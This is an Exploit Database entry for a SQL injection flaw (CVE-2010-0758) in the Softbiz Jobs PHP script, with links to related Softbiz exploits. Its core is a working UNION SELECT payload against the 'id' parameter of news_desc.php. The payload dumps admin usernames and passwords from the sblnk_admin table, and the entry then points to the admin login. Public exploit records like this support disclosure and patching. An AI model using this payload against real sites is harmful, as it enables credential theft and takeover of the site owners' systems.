Exploit Database - Logo

Softbiz Jobs - (news_desc) SQL Injection

EDB-ID: 11518 Author: BAYBORA CVE: CVE-2010-0758
Published: 2010-02-22 Type: webapps Platform: PHP
E-DB Verified: Verified Exploit: Download Exploit Code Download // View Raw Vulnerable App: N/A
Tags: Vulnerability
« Previous Exploit Next Exploit » 
Softbiz Jobs ( news_desc) SQL Injection Vulnerability

########################### 
Author    : Baybora

Homepage  : http://www.1923turk.com 

Blog      : http://baybora.wordpress.com/

Script    : softbizscripts

Download  : http://www.softbizscripts.com/

########################### 
  
Exploat  :news_desc.php?id=SQL 
   

-4+union+select+1,concat(username,0x3a,password),3,4,5+from+sblnk_admin--
  
  
  
http://server/news_desc.php?id=-4+union+select+1,concat(username,0x3a,password),3,4,5+from+sblnk_admin--
  
 
http://xxxx/admin
 
  
##############################################################  
# Greetz: Manas58 - Gamoscu - Delibey - Tiamo - Psiko - Turco - infazci - X-TRO  
##############################################################

Related Exploits

Matching CVEs (1): CVE-2010-0758
Matching OSVDBs (1): 62649
Other Possible E-DB Search Terms: Softbiz Jobs
Date D V EDB-ID Title Author
2007-10-08Download Exploit Code Verified 4504Softbiz Jobs & Recruitment - SQL InjectionKhashayar Fereidani
2010-02-23Download Exploit Code Verified 11543Softbiz Jobs - Cross-Site Request Forgerypratul agrawal
2010-02-23Download Exploit Code Verified 11551Softbiz Jobs - Multiple SQL InjectionsEasy Laster
2010-03-10Download Exploit Code Verified 11679Softbiz Jobs and Recruitment Script - 'search_result.php' SQL InjectionEasy Laster
2010-02-23Download Exploit Code Verified 33665Softbiz Jobs - 'sbad_type' Parameter Cross-Site Scriptingpratul agrawal